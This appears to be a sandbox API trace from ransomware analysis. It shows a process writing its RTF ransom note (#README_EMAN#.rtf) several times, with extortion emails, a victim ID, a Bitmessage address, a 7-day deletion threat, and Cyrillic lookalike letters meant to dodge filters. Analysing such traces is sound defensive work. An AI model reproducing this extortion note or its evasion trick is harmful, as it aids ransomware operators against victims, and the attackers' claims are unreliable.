;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a558, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0207.603] WriteFile (in: hFile=0x2f4, lpBuffer=0x248a558*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a558*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0207.603] CloseHandle (hObject=0x2f4) returned 1 [0207.603] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\#readme_eman#.rtf")) returned 0xffffffff [0207.603] GetLastError () returned 0x2 [0207.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0207.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0207.817] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. 